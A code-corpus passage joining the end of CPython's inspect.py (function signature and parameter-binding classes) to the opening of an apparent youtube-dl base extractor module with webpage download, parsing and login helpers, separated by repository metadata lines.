msg = msg.format(_get_paramkind_descr(self._kind))
raise ValueError(msg)
self._default = default
self._annotation = annotation
if name is _empty:
raise ValueError('name is a required attribute for Parameter')
if not isinstance(name, str):
msg = 'name must be a str, not a {}'.format(type(name).__name__)
raise TypeError(msg)
if name[0] == '.' and name[1:].isdigit():
# These are implicit arguments generated by comprehensions. In
# order to provide a friendlier interface to users, we recast
# their name as "implicitN" and treat them as positional-only.
# See issue 19611.
if self._kind != _POSITIONAL_OR_KEYWORD:
msg = (
'implicit arguments must be passed as '
'positional or keyword arguments, not {}'
)
msg = msg.format(_get_paramkind_descr(self._kind))
raise ValueError(msg)
self._kind = _POSITIONAL_ONLY
name = 'implicit{}'.format(name[1:])
if not name.isidentifier():
raise ValueError('{!r} is not a valid parameter name'.format(name))
self._name = name
def __reduce__(self):
return (type(self),
(self._name, self._kind),
{'_default': self._default,
'_annotation': self._annotation})
def __setstate__(self, state):
self._default = state['_default']
self._annotation = state['_annotation']
@property
def name(self):
return self._name
@property
def default(self):
return self._default
@property
def annotation(self):
return self._annotation
@property
def kind(self):
return self._kind
def replace(self, *, name=_void, kind=_void,
annotation=_void, default=_void):
"""Creates a customized copy of the Parameter."""
if name is _void:
name = self._name
if kind is _void:
kind = self._kind
if annotation is _void:
annotation = self._annotation
if default is _void:
default = self._default
return type(self)(name, kind, default=default, annotation=annotation)
def __str__(self):
kind = self.kind
formatted = self._name
# Add annotation and default value
if self._annotation is not _empty:
formatted = '{}: {}'.format(formatted,
formatannotation(self._annotation))
if self._default is not _empty:
if self._annotation is not _empty:
formatted = '{} = {}'.format(formatted, repr(self._default))
else:
formatted = '{}={}'.format(formatted, repr(self._default))
if kind == _VAR_POSITIONAL:
formatted = '*' + formatted
elif kind == _VAR_KEYWORD:
formatted = '**' + formatted
return formatted
def __repr__(self):
return '<{} "{}">'.format(self.__class__.__name__, self)
def __hash__(self):
return hash((self.name, self.kind, self.annotation, self.default))
def __eq__(self, other):
if self is other:
return True
if not isinstance(other, Parameter):
return NotImplemented
return (self._name == other._name and
self._kind == other._kind and
self._default == other._default and
self._annotation == other._annotation)
class BoundArguments:
"""Result of `Signature.bind` call. Holds the mapping of arguments
to the function's parameters.
Has the following public attributes:
* arguments : OrderedDict
An ordered mutable mapping of parameters' names to arguments' values.
Does not contain arguments' default values.
* signature : Signature
The Signature object that created this instance.
* args : tuple
Tuple of positional arguments values.
* kwargs : dict
Dict of keyword arguments values.
"""
__slots__ = ('arguments', '_signature', '__weakref__')
def __init__(self, signature, arguments):
self.arguments = arguments
self._signature = signature
@property
def signature(self):
return self._signature
@property
def args(self):
args = []
for param_name, param in self._signature.parameters.items():
if param.kind in (_VAR_KEYWORD, _KEYWORD_ONLY):
break
try:
arg = self.arguments[param_name]
except KeyError:
# We're done here. Other arguments
# will be mapped in 'BoundArguments.kwargs'
break
else:
if param.kind == _VAR_POSITIONAL:
# *args
args.extend(arg)
else:
# plain argument
args.append(arg)
return tuple(args)
@property
def kwargs(self):
kwargs = {}
kwargs_started = False
for param_name, param in self._signature.parameters.items():
if not kwargs_started:
if param.kind in (_VAR_KEYWORD, _KEYWORD_ONLY):
kwargs_started = True
else:
if param_name not in self.arguments:
kwargs_started = True
continue
if not kwargs_started:
continue
try:
arg = self.arguments[param_name]
except KeyError:
pass
else:
if param.kind == _VAR_KEYWORD:
# **kwargs
kwargs.update(arg)
else:
# plain keyword argument
kwargs[param_name] = arg
return kwargs
def apply_defaults(self):
"""Set default values for missing arguments.
For variable-positional arguments (*args) the default is an
empty tuple.
For variable-keyword arguments (**kwargs) the default is an
empty dict.
"""
arguments = self.arguments
new_arguments = []
for name, param in self._signature.parameters.items():
try:
new_arguments.append((name, arguments[name]))
except KeyError:
if param.default is not _empty:
val = param.default
elif param.kind is _VAR_POSITIONAL:
val = ()
elif param.kind is _VAR_KEYWORD:
val = {}
else:
# This BoundArguments was likely produced by
# Signature.bind_partial().
continue
new_arguments.append((name, val))
self.arguments = OrderedDict(new_arguments)
def __eq__(self, other):
if self is other:
return True
if not isinstance(other, BoundArguments):
return NotImplemented
return (self.signature == other.signature and
self.arguments == other.arguments)
def __setstate__(self, state):
self._signature = state['_signature']
self.arguments = state['arguments']
def __getstate__(self):
return {'_signature': self._signature, 'arguments': self.arguments}
def __repr__(self):
args = []
for arg, value in self.arguments.items():
args.append('{}={!r}'.format(arg, value))
return '<{} ({})>'.format(self.__class__.__name__, ', '.join(args))
class Signature:
"""A Signature object represents the overall signature of a function.
It stores a Parameter object for each parameter accepted by the
function, as well as information specific to the function itself.
A Signature object has the following public attributes and methods:
* parameters : OrderedDict
An ordered mapping of parameters' names to the corresponding
Parameter objects (keyword-only arguments are in the same order
as listed in `code.co_varnames`).
* return_annotation : object
The annotation for the return type of the function if specified.
If the function has no annotation for its return type, this
attribute is set to `Signature.empty`.
* bind(*args, **kwargs) -> BoundArguments
Creates a mapping from positional and keyword arguments to
parameters.
* bind_partial(*args, **kwargs) -> BoundArguments
Creates a partial mapping from positional and keyword arguments
to parameters (simulating 'functools.partial' behavior.)
"""
__slots__ = ('_return_annotation', '_parameters')
_parameter_cls = Parameter
_bound_arguments_cls = BoundArguments
empty = _empty
def __init__(self, parameters=None, *, return_annotation=_empty,
__validate_parameters__=True):
"""Constructs Signature from the given list of Parameter
objects and 'return_annotation'. All arguments are optional.
"""
if parameters is None:
params = OrderedDict()
else:
if __validate_parameters__:
params = OrderedDict()
top_kind = _POSITIONAL_ONLY
kind_defaults = False
for idx, param in enumerate(parameters):
kind = param.kind
name = param.name
if kind < top_kind:
msg = (
'wrong parameter order: {} parameter before {} '
'parameter'
)
msg = msg.format(_get_paramkind_descr(top_kind),
_get_paramkind_descr(kind))
raise ValueError(msg)
elif kind > top_kind:
kind_defaults = False
top_kind = kind
if kind in (_POSITIONAL_ONLY, _POSITIONAL_OR_KEYWORD):
if param.default is _empty:
if kind_defaults:
# No default for this parameter, but the
# previous parameter of the same kind had
# a default
msg = 'non-default argument follows default ' \
'argument'
raise ValueError(msg)
else:
# There is a default for this parameter.
kind_defaults = True
if name in params:
msg = 'duplicate parameter name: {!r}'.format(name)
raise ValueError(msg)
params[name] = param
else:
params = OrderedDict(((param.name, param)
for param in parameters))
self._parameters = types.MappingProxyType(params)
self._return_annotation = return_annotation
@classmethod
def from_function(cls, func):
"""Constructs Signature for the given python function.
Deprecated since Python 3.5, use `Signature.from_callable()`.
"""
warnings.warn("inspect.Signature.from_function() is deprecated since "
"Python 3.5, use Signature.from_callable()",
DeprecationWarning, stacklevel=2)
return _signature_from_function(cls, func)
@classmethod
def from_builtin(cls, func):
"""Constructs Signature for the given builtin function.
Deprecated since Python 3.5, use `Signature.from_callable()`.
"""
warnings.warn("inspect.Signature.from_builtin() is deprecated since "
"Python 3.5, use Signature.from_callable()",
DeprecationWarning, stacklevel=2)
return _signature_from_builtin(cls, func)
@classmethod
def from_callable(cls, obj, *, follow_wrapped=True):
"""Constructs Signature for the given callable object."""
return _signature_from_callable(obj, sigcls=cls,
follow_wrapper_chains=follow_wrapped)
@property
def parameters(self):
return self._parameters
@property
def return_annotation(self):
return self._return_annotation
def replace(self, *, parameters=_void, return_annotation=_void):
"""Creates a customized copy of the Signature.
Pass 'parameters' and/or 'return_annotation' arguments
to override them in the new copy.
"""
if parameters is _void:
parameters = self.parameters.values()
if return_annotation is _void:
return_annotation = self._return_annotation
return type(self)(parameters,
return_annotation=return_annotation)
def _hash_basis(self):
params = tuple(param for param in self.parameters.values()
if param.kind != _KEYWORD_ONLY)
kwo_params = {param.name: param for param in self.parameters.values()
if param.kind == _KEYWORD_ONLY}
return params, kwo_params, self.return_annotation
def __hash__(self):
params, kwo_params, return_annotation = self._hash_basis()
kwo_params = frozenset(kwo_params.values())
return hash((params, kwo_params, return_annotation))
def __eq__(self, other):
if self is other:
return True
if not isinstance(other, Signature):
return NotImplemented
return self._hash_basis() == other._hash_basis()
def _bind(self, args, kwargs, *, partial=False):
"""Private method. Don't use directly."""
arguments = OrderedDict()
parameters = iter(self.parameters.values())
parameters_ex = ()
arg_vals = iter(args)
while True:
# Let's iterate through the positional arguments and corresponding
# parameters
try:
arg_val = next(arg_vals)
except StopIteration:
# No more positional arguments
try:
param = next(parameters)
except StopIteration:
# No more parameters. That's it. Just need to check that
# we have no `kwargs` after this while loop
break
else:
if param.kind == _VAR_POSITIONAL:
# That's OK, just empty *args. Let's start parsing
# kwargs
break
elif param.name in kwargs:
if param.kind == _POSITIONAL_ONLY:
msg = '{arg!r} parameter is positional only, ' \
'but was passed as a keyword'
msg = msg.format(arg=param.name)
raise TypeError(msg) from None
parameters_ex = (param,)
break
elif (param.kind == _VAR_KEYWORD or
param.default is not _empty):
# That's fine too - we have a default value for this
# parameter. So, lets start parsing `kwargs`, starting
# with the current parameter
parameters_ex = (param,)
break
else:
# No default, not VAR_KEYWORD, not VAR_POSITIONAL,
# not in `kwargs`
if partial:
parameters_ex = (param,)
break
else:
msg = 'missing a required argument: {arg!r}'
msg = msg.format(arg=param.name)
raise TypeError(msg) from None
else:
# We have a positional argument to process
try:
param = next(parameters)
except StopIteration:
raise TypeError('too many positional arguments') from None
else:
if param.kind in (_VAR_KEYWORD, _KEYWORD_ONLY):
# Looks like we have no parameter for this positional
# argument
raise TypeError(
'too many positional arguments') from None
if param.kind == _VAR_POSITIONAL:
# We have an '*args'-like argument, let's fill it with
# all positional arguments we have left and move on to
# the next phase
values = [arg_val]
values.extend(arg_vals)
arguments[param.name] = tuple(values)
break
if param.name in kwargs:
raise TypeError(
'multiple values for argument {arg!r}'.format(
arg=param.name)) from None
arguments[param.name] = arg_val
# Now, we iterate through the remaining parameters to process
# keyword arguments
kwargs_param = None
for param in itertools.chain(parameters_ex, parameters):
if param.kind == _VAR_KEYWORD:
# Memorize that we have a '**kwargs'-like parameter
kwargs_param = param
continue
if param.kind == _VAR_POSITIONAL:
# Named arguments don't refer to '*args'-like parameters.
# We only arrive here if the positional arguments ended
# before reaching the last parameter before *args.
continue
param_name = param.name
try:
arg_val = kwargs.pop(param_name)
except KeyError:
# We have no value for this parameter. It's fine though,
# if it has a default value, or it is an '*args'-like
# parameter, left alone by the processing of positional
# arguments.
if (not partial and param.kind != _VAR_POSITIONAL and
param.default is _empty):
raise TypeError('missing a required argument: {arg!r}'. \
format(arg=param_name)) from None
else:
if param.kind == _POSITIONAL_ONLY:
# This should never happen in case of a properly built
# Signature object (but let's have this check here
# to ensure correct behaviour just in case)
raise TypeError('{arg!r} parameter is positional only, '
'but was passed as a keyword'. \
format(arg=param.name))
arguments[param_name] = arg_val
if kwargs:
if kwargs_param is not None:
# Process our '**kwargs'-like parameter
arguments[kwargs_param.name] = kwargs
else:
raise TypeError(
'got an unexpected keyword argument {arg!r}'.format(
arg=next(iter(kwargs))))
return self._bound_arguments_cls(self, arguments)
def bind(*args, **kwargs):
"""Get a BoundArguments object, that maps the passed `args`
and `kwargs` to the function's signature. Raises `TypeError`
if the passed arguments can not be bound.
"""
return args[0]._bind(args[1:], kwargs)
def bind_partial(*args, **kwargs):
"""Get a BoundArguments object, that partially maps the
passed `args` and `kwargs` to the function's signature.
Raises `TypeError` if the passed arguments can not be bound.
"""
return args[0]._bind(args[1:], kwargs, partial=True)
def __reduce__(self):
return (type(self),
(tuple(self._parameters.values()),),
{'_return_annotation': self._return_annotation})
def __setstate__(self, state):
self._return_annotation = state['_return_annotation']
def __repr__(self):
return '<{} {}>'.format(self.__class__.__name__, self)
def __str__(self):
result = []
render_pos_only_separator = False
render_kw_only_separator = True
for param in self.parameters.values():
formatted = str(param)
kind = param.kind
if kind == _POSITIONAL_ONLY:
render_pos_only_separator = True
elif render_pos_only_separator:
# It's not a positional-only parameter, and the flag
# is set to 'True' (there were pos-only params before.)
result.append('/')
render_pos_only_separator = False
if kind == _VAR_POSITIONAL:
# OK, we have an '*args'-like parameter, so we won't need
# a '*' to separate keyword-only arguments
render_kw_only_separator = False
elif kind == _KEYWORD_ONLY and render_kw_only_separator:
# We have a keyword-only parameter to render and we haven't
# rendered an '*args'-like parameter before, so add a '*'
# separator to the parameters list ("foo(arg1, *, arg2)" case)
result.append('*')
# This condition should be only triggered once, so
# reset the flag
render_kw_only_separator = False
result.append(formatted)
if render_pos_only_separator:
# There were only positional-only parameters, hence the
# flag was not reset to 'False'
result.append('/')
rendered = '({})'.format(', '.join(result))
if self.return_annotation is not _empty:
anno = formatannotation(self.return_annotation)
rendered += ' -> {}'.format(anno)
return rendered
def signature(obj, *, follow_wrapped=True):
"""Get a signature object for the passed callable."""
return Signature.from_callable(obj, follow_wrapped=follow_wrapped)
def _main():
""" Logic for inspecting an object given at command line """
import argparse
import importlib
parser = argparse.ArgumentParser()
parser.add_argument(
'object',
help="The object to be analysed. "
"It supports the 'module:qualname' syntax")
parser.add_argument(
'-d', '--details', action='store_true',
help='Display info about the module rather than its source code')
args = parser.parse_args()
target = args.object
mod_name, has_attrs, attrs = target.partition(":")
try:
obj = module = importlib.import_module(mod_name)
except Exception as exc:
msg = "Failed to import {} ({}: {})".format(mod_name,
type(exc).__name__,
exc)
print(msg, file=sys.stderr)
exit(2)
if has_attrs:
parts = attrs.split(".")
obj = module
for part in parts:
obj = getattr(obj, part)
if module.__name__ in sys.builtin_module_names:
print("Can't get info for builtin modules.", file=sys.stderr)
exit(1)
if args.details:
print('Target: {}'.format(target))
print('Origin: {}'.format(getsourcefile(module)))
print('Cached: {}'.format(module.__cached__))
if obj is module:
print('Loader: {}'.format(repr(module.__loader__)))
if hasattr(module, '__path__'):
print('Submodule search path: {}'.format(module.__path__))
else:
try:
__, lineno = findsource(obj)
except Exception:
pass
else:
print('Line: {}'.format(lineno))
print('\n')
else:
print(getsource(obj))
if __name__ == "__main__":
_main()
|
FFMG/myoddweb.piger
|
monitor/api/python/Python-3.7.2/Lib/inspect.py
|
Python
|
gpl-2.0
| 117,615
|
[
"VisIt"
] |
5ad6bf302604e4c80e052cdaa22321d16a1a2cef12a0bbceb21ef5334b3c87bd
|
from __future__ import unicode_literals
import base64
import datetime
import hashlib
import json
import netrc
import os
import re
import socket
import sys
import time
import xml.etree.ElementTree
from ..compat import (
compat_cookiejar,
compat_HTTPError,
compat_http_client,
compat_urllib_error,
compat_urllib_parse_urlparse,
compat_urlparse,
compat_str,
)
from ..utils import (
age_restricted,
clean_html,
compiled_regex_type,
ExtractorError,
float_or_none,
int_or_none,
RegexNotFoundError,
sanitize_filename,
unescapeHTML,
)
_NO_DEFAULT = object()
class InfoExtractor(object):
"""Information Extractor class.
Information extractors are the classes that, given a URL, extract
information about the video (or videos) the URL refers to. This
information includes the real video URL, the video title, author and
others. The information is stored in a dictionary which is then
passed to the YoutubeDL. The YoutubeDL processes this
information possibly downloading the video to the file system, among
other possible outcomes.
The type field determines the the type of the result.
By far the most common value (and the default if _type is missing) is
"video", which indicates a single video.
For a video, the dictionaries must include the following fields:
id: Video identifier.
title: Video title, unescaped.
Additionally, it must contain either a formats entry or a url one:
formats: A list of dictionaries for each format available, ordered
from worst to best quality.
Potential fields:
* url Mandatory. The URL of the video file
* ext Will be calculated from url if missing
* format A human-readable description of the format
("mp4 container with h264/opus").
Calculated from the format_id, width, height.
and format_note fields if missing.
* format_id A short description of the format
("mp4_h264_opus" or "19").
Technically optional, but strongly recommended.
* format_note Additional info about the format
("3D" or "DASH video")
* width Width of the video, if known
* height Height of the video, if known
* resolution Textual description of width and height
* tbr Average bitrate of audio and video in KBit/s
* abr Average audio bitrate in KBit/s
* acodec Name of the audio codec in use
* asr Audio sampling rate in Hertz
* vbr Average video bitrate in KBit/s
* fps Frame rate
* vcodec Name of the video codec in use
* container Name of the container format
* filesize The number of bytes, if known in advance
* filesize_approx An estimate for the number of bytes
* player_url SWF Player URL (used for rtmpdump).
* protocol The protocol that will be used for the actual
download, lower-case.
"http", "https", "rtsp", "rtmp", "rtmpe",
"m3u8", or "m3u8_native".
* preference Order number of this format. If this field is
present and not None, the formats get sorted
by this field, regardless of all other values.
-1 for default (order by other properties),
-2 or smaller for less than default.
< -1000 to hide the format (if there is
another one which is strictly better)
* language_preference Is this in the correct requested
language?
10 if it's what the URL is about,
-1 for default (don't know),
-10 otherwise, other values reserved for now.
* quality Order number of the video quality of this
format, irrespective of the file format.
-1 for default (order by other properties),
-2 or smaller for less than default.
* source_preference Order number for this video source
(quality takes higher priority)
-1 for default (order by other properties),
-2 or smaller for less than default.
* http_method HTTP method to use for the download.
* http_headers A dictionary of additional HTTP headers
to add to the request.
* http_post_data Additional data to send with a POST
request.
* stretched_ratio If given and not 1, indicates that the
video's pixels are not square.
width : height ratio as float.
* no_resume The server does not support resuming the
(HTTP or RTMP) download. Boolean.
url: Final video URL.
ext: Video filename extension.
format: The video format, defaults to ext (used for --get-format)
player_url: SWF Player URL (used for rtmpdump).
The following fields are optional:
alt_title: A secondary title of the video.
display_id An alternative identifier for the video, not necessarily
unique, but available before title. Typically, id is
something like "4234987", title "Dancing naked mole rats",
and display_id "dancing-naked-mole-rats"
thumbnails: A list of dictionaries, with the following entries:
* "id" (optional, string) - Thumbnail format ID
* "url"
* "preference" (optional, int) - quality of the image
* "width" (optional, int)
* "height" (optional, int)
* "resolution" (optional, string "{width}x{height"},
deprecated)
thumbnail: Full URL to a video thumbnail image.
description: Full video description.
uploader: Full name of the video uploader.
creator: The main artist who created the video.
timestamp: UNIX timestamp of the moment the video became available.
upload_date: Video upload date (YYYYMMDD).
If not explicitly set, calculated from timestamp.
uploader_id: Nickname or id of the video uploader.
location: Physical location where the video was filmed.
subtitles: The subtitle file contents as a dictionary in the format
{language: subtitles}.
duration: Length of the video in seconds, as an integer.
view_count: How many users have watched the video on the platform.
like_count: Number of positive ratings of the video
dislike_count: Number of negative ratings of the video
average_rating: Average rating give by users, the scale used depends on the webpage
comment_count: Number of comments on the video
comments: A list of comments, each with one or more of the following
properties (all but one of text or html optional):
* "author" - human-readable name of the comment author
* "author_id" - user ID of the comment author
* "id" - Comment ID
* "html" - Comment as HTML
* "text" - Plain text of the comment
* "timestamp" - UNIX timestamp of comment
* "parent" - ID of the comment this one is replying to.
Set to "root" to indicate that this is a
comment to the original video.
age_limit: Age restriction for the video, as an integer (years)
webpage_url: The url to the video webpage, if given to youtube-dl it
should allow to get the same result again. (It will be set
by YoutubeDL if it's missing)
categories: A list of categories that the video falls in, for example
["Sports", "Berlin"]
is_live: True, False, or None (=unknown). Whether this video is a
live stream that goes on instead of a fixed-length video.
Unless mentioned otherwise, the fields should be Unicode strings.
Unless mentioned otherwise, None is equivalent to absence of information.
_type "playlist" indicates multiple videos.
There must be a key "entries", which is a list, an iterable, or a PagedList
object, each element of which is a valid dictionary by this specification.
Additionally, playlists can have "title" and "id" attributes with the same
semantics as videos (see above).
_type "multi_video" indicates that there are multiple videos that
form a single show, for examples multiple acts of an opera or TV episode.
It must have an entries key like a playlist and contain all the keys
required for a video at the same time.
_type "url" indicates that the video must be extracted from another
location, possibly by a different extractor. Its only required key is:
"url" - the next URL to extract.
The key "ie_key" can be set to the class name (minus the trailing "IE",
e.g. "Youtube") if the extractor class is known in advance.
Additionally, the dictionary may have any properties of the resolved entity
known in advance, for example "title" if the title of the referred video is
known ahead of time.
_type "url_transparent" entities have the same specification as "url", but
indicate that the given additional information is more precise than the one
associated with the resolved URL.
This is useful when a site employs a video service that hosts the video and
its technical metadata, but that video service does not embed a useful
title, description etc.
Subclasses of this one should re-define the _real_initialize() and
_real_extract() methods and define a _VALID_URL regexp.
Probably, they should also be added to the list of extractors.
Finally, the _WORKING attribute should be set to False for broken IEs
in order to warn the users and skip the tests.
"""
_ready = False
_downloader = None
_WORKING = True
def __init__(self, downloader=None):
"""Constructor. Receives an optional downloader."""
self._ready = False
self.set_downloader(downloader)
@classmethod
def suitable(cls, url):
"""Receives a URL and returns True if suitable for this IE."""
# This does not use has/getattr intentionally - we want to know whether
# we have cached the regexp for *this* class, whereas getattr would also
# match the superclass
if '_VALID_URL_RE' not in cls.__dict__:
cls._VALID_URL_RE = re.compile(cls._VALID_URL)
return cls._VALID_URL_RE.match(url) is not None
@classmethod
def _match_id(cls, url):
if '_VALID_URL_RE' not in cls.__dict__:
cls._VALID_URL_RE = re.compile(cls._VALID_URL)
m = cls._VALID_URL_RE.match(url)
assert m
return m.group('id')
@classmethod
def working(cls):
"""Getter method for _WORKING."""
return cls._WORKING
def initialize(self):
"""Initializes an instance (authentication, etc)."""
if not self._ready:
self._real_initialize()
self._ready = True
def extract(self, url):
"""Extracts URL information and returns it in list of dicts."""
try:
self.initialize()
return self._real_extract(url)
except ExtractorError:
raise
except compat_http_client.IncompleteRead as e:
raise ExtractorError('A network error has occured.', cause=e, expected=True)
except (KeyError, StopIteration) as e:
raise ExtractorError('An extractor error has occured.', cause=e)
def set_downloader(self, downloader):
"""Sets the downloader for this IE."""
self._downloader = downloader
def _real_initialize(self):
"""Real initialization process. Redefine in subclasses."""
pass
def _real_extract(self, url):
"""Real extraction process. Redefine in subclasses."""
pass
@classmethod
def ie_key(cls):
"""A string for getting the InfoExtractor with get_info_extractor"""
return cls.__name__[:-2]
@property
def IE_NAME(self):
return type(self).__name__[:-2]
def _request_webpage(self, url_or_request, video_id, note=None, errnote=None, fatal=True):
""" Returns the response handle """
if note is None:
self.report_download_webpage(video_id)
elif note is not False:
if video_id is None:
self.to_screen('%s' % (note,))
else:
self.to_screen('%s: %s' % (video_id, note))
try:
return self._downloader.urlopen(url_or_request)
except (compat_urllib_error.URLError, compat_http_client.HTTPException, socket.error) as err:
if errnote is False:
return False
if errnote is None:
errnote = 'Unable to download webpage'
errmsg = '%s: %s' % (errnote, compat_str(err))
if fatal:
raise ExtractorError(errmsg, sys.exc_info()[2], cause=err)
else:
self._downloader.report_warning(errmsg)
return False
def _download_webpage_handle(self, url_or_request, video_id, note=None, errnote=None, fatal=True):
""" Returns a tuple (page content as string, URL handle) """
# Strip hashes from the URL (#1038)
if isinstance(url_or_request, (compat_str, str)):
url_or_request = url_or_request.partition('#')[0]
urlh = self._request_webpage(url_or_request, video_id, note, errnote, fatal)
if urlh is False:
assert not fatal
return False
content = self._webpage_read_content(urlh, url_or_request, video_id, note, errnote, fatal)
return (content, urlh)
def _webpage_read_content(self, urlh, url_or_request, video_id, note=None, errnote=None, fatal=True, prefix=None):
content_type = urlh.headers.get('Content-Type', '')
webpage_bytes = urlh.read()
if prefix is not None:
webpage_bytes = prefix + webpage_bytes
m = re.match(r'[a-zA-Z0-9_.-]+/[a-zA-Z0-9_.-]+\s*;\s*charset=(.+)', content_type)
if m:
encoding = m.group(1)
else:
m = re.search(br'<meta[^>]+charset=[\'"]?([^\'")]+)[ /\'">]',
webpage_bytes[:1024])
if m:
encoding = m.group(1).decode('ascii')
elif webpage_bytes.startswith(b'\xff\xfe'):
encoding = 'utf-16'
else:
encoding = 'utf-8'
if self._downloader.params.get('dump_intermediate_pages', False):
try:
url = url_or_request.get_full_url()
except AttributeError:
url = url_or_request
self.to_screen('Dumping request to ' + url)
dump = base64.b64encode(webpage_bytes).decode('ascii')
self._downloader.to_screen(dump)
if self._downloader.params.get('write_pages', False):
try:
url = url_or_request.get_full_url()
except AttributeError:
url = url_or_request
basen = '%s_%s' % (video_id, url)
if len(basen) > 240:
h = '___' + hashlib.md5(basen.encode('utf-8')).hexdigest()
basen = basen[:240 - len(h)] + h
raw_filename = basen + '.dump'
filename = sanitize_filename(raw_filename, restricted=True)
self.to_screen('Saving request to ' + filename)
# Working around MAX_PATH limitation on Windows (see
# http://msdn.microsoft.com/en-us/library/windows/desktop/aa365247(v=vs.85).aspx)
if os.name == 'nt':
absfilepath = os.path.abspath(filename)
if len(absfilepath) > 259:
filename = '\\\\?\\' + absfilepath
with open(filename, 'wb') as outf:
outf.write(webpage_bytes)
try:
content = webpage_bytes.decode(encoding, 'replace')
except LookupError:
content = webpage_bytes.decode('utf-8', 'replace')
if ('<title>Access to this site is blocked</title>' in content and
'Websense' in content[:512]):
msg = 'Access to this webpage has been blocked by Websense filtering software in your network.'
blocked_iframe = self._html_search_regex(
r'<iframe src="([^"]+)"', content,
'Websense information URL', default=None)
if blocked_iframe:
msg += ' Visit %s for more details' % blocked_iframe
raise ExtractorError(msg, expected=True)
return content
def _download_webpage(self, url_or_request, video_id, note=None, errnote=None, fatal=True, tries=1, timeout=5):
""" Returns the data of the page as a string """
success = False
try_count = 0
while success is False:
try:
res = self._download_webpage_handle(url_or_request, video_id, note, errnote, fatal)
success = True
except compat_http_client.IncompleteRead as e:
try_count += 1
if try_count >= tries:
raise e
self._sleep(timeout, video_id)
if res is False:
return res
else:
content, _ = res
return content
def _download_xml(self, url_or_request, video_id,
note='Downloading XML', errnote='Unable to download XML',
transform_source=None, fatal=True):
"""Return the xml as an xml.etree.ElementTree.Element"""
xml_string = self._download_webpage(
url_or_request, video_id, note, errnote, fatal=fatal)
if xml_string is False:
return xml_string
if transform_source:
xml_string = transform_source(xml_string)
return xml.etree.ElementTree.fromstring(xml_string.encode('utf-8'))
def _download_json(self, url_or_request, video_id,
note='Downloading JSON metadata',
errnote='Unable to download JSON metadata',
transform_source=None,
fatal=True):
json_string = self._download_webpage(
url_or_request, video_id, note, errnote, fatal=fatal)
if (not fatal) and json_string is False:
return None
return self._parse_json(
json_string, video_id, transform_source=transform_source, fatal=fatal)
def _parse_json(self, json_string, video_id, transform_source=None, fatal=True):
if transform_source:
json_string = transform_source(json_string)
try:
return json.loads(json_string)
except ValueError as ve:
errmsg = '%s: Failed to parse JSON ' % video_id
if fatal:
raise ExtractorError(errmsg, cause=ve)
else:
self.report_warning(errmsg + str(ve))
def report_warning(self, msg, video_id=None):
idstr = '' if video_id is None else '%s: ' % video_id
self._downloader.report_warning(
'[%s] %s%s' % (self.IE_NAME, idstr, msg))
def to_screen(self, msg):
"""Print msg to screen, prefixing it with '[ie_name]'"""
self._downloader.to_screen('[%s] %s' % (self.IE_NAME, msg))
def report_extraction(self, id_or_name):
"""Report information extraction."""
self.to_screen('%s: Extracting information' % id_or_name)
def report_download_webpage(self, video_id):
"""Report webpage download."""
self.to_screen('%s: Downloading webpage' % video_id)
def report_age_confirmation(self):
"""Report attempt to confirm age."""
self.to_screen('Confirming age')
def report_login(self):
"""Report attempt to log in."""
self.to_screen('Logging in')
# Methods for following #608
@staticmethod
def url_result(url, ie=None, video_id=None):
"""Returns a url that points to a page that should be processed"""
# TODO: ie should be the class used for getting the info
video_info = {'_type': 'url',
'url': url,
'ie_key': ie}
if video_id is not None:
video_info['id'] = video_id
return video_info
@staticmethod
def playlist_result(entries, playlist_id=None, playlist_title=None, playlist_description=None):
"""Returns a playlist"""
video_info = {'_type': 'playlist',
'entries': entries}
if playlist_id:
video_info['id'] = playlist_id
if playlist_title:
video_info['title'] = playlist_title
if playlist_description:
video_info['description'] = playlist_description
return video_info
def _search_regex(self, pattern, string, name, default=_NO_DEFAULT, fatal=True, flags=0, group=None):
"""
Perform a regex search on the given string, using a single or a list of
patterns returning the first matching group.
In case of failure return a default value or raise a WARNING or a
RegexNotFoundError, depending on fatal, specifying the field name.
"""
if isinstance(pattern, (str, compat_str, compiled_regex_type)):
mobj = re.search(pattern, string, flags)
else:
for p in pattern:
mobj = re.search(p, string, flags)
if mobj:
break
if not self._downloader.params.get('no_color') and os.name != 'nt' and sys.stderr.isatty():
_name = '\033[0;34m%s\033[0m' % name
else:
_name = name
if mobj:
if group is None:
# return the first matching group
return next(g for g in mobj.groups() if g is not None)
else:
return mobj.group(group)
elif default is not _NO_DEFAULT:
return default
elif fatal:
raise RegexNotFoundError('Unable to extract %s' % _name)
else:
self._downloader.report_warning('unable to extract %s; '
'please report this issue on http://yt-dl.org/bug' % _name)
return None
def _html_search_regex(self, pattern, string, name, default=_NO_DEFAULT, fatal=True, flags=0, group=None):
"""
Like _search_regex, but strips HTML tags and unescapes entities.
"""
res = self._search_regex(pattern, string, name, default, fatal, flags, group)
if res:
return clean_html(res).strip()
else:
return res
def _get_login_info(self):
"""
Get the the login info as (username, password)
It will look in the netrc file using the _NETRC_MACHINE value
If there's no info available, return (None, None)
"""
if self._downloader is None:
return (None, None)
username = None
password = None
downloader_params = self._downloader.params
# Attempt to use provided username and password or .netrc data
if downloader_params.get('username', None) is not None:
username = downloader_params['username']
password = downloader_params['password']
elif downloader_params.get('usenetrc', False):
try:
info = netrc.netrc().authenticators(self._NETRC_MACHINE)
if info is not None:
username = info[0]
password = info[2]
else:
raise netrc.NetrcParseError('No authenticators for %s' % self._NETRC_MACHINE)
except (IOError, netrc.NetrcParseError) as err:
self._downloader.report_warning('parsing .netrc: %s' % compat_str(err))
return (username, password)
def _get_tfa_info(self):
"""
Get the two-factor authentication info
TODO - asking the user will be required for sms/phone verify
currently just uses the command line option
If there's no info available, return None
"""
if self._downloader is None:
return None
downloader_params = self._downloader.params
if downloader_params.get('twofactor', None) is not None:
return downloader_params['twofactor']
return None
# Helper functions for extracting OpenGraph info
@staticmethod
def _og_regexes(prop):
content_re = r'content=(?:"([^>]+?)"|\'([^>]+?)\')'
property_re = r'(?:name|property)=[\'"]og:%s[\'"]' % re.escape(prop)
template = r'<meta[^>]+?%s[^>]+?%s'
return [
template % (property_re, content_re),
template % (content_re, property_re),
]
def _og_search_property(self, prop, html, name=None, **kargs):
if name is None:
name = 'OpenGraph %s' % prop
escaped = self._search_regex(self._og_regexes(prop), html, name, flags=re.DOTALL, **kargs)
if escaped is None:
return None
return unescapeHTML(escaped)
def _og_search_thumbnail(self, html, **kargs):
return self._og_search_property('image', html, 'thumbnail url', fatal=False, **kargs)
def _og_search_description(self, html, **kargs):
return self._og_search_property('description', html, fatal=False, **kargs)
def _og_search_title(self, html, **kargs):
return self._og_search_property('title', html, **kargs)
def _og_search_video_url(self, html, name='video url', secure=True, **kargs):
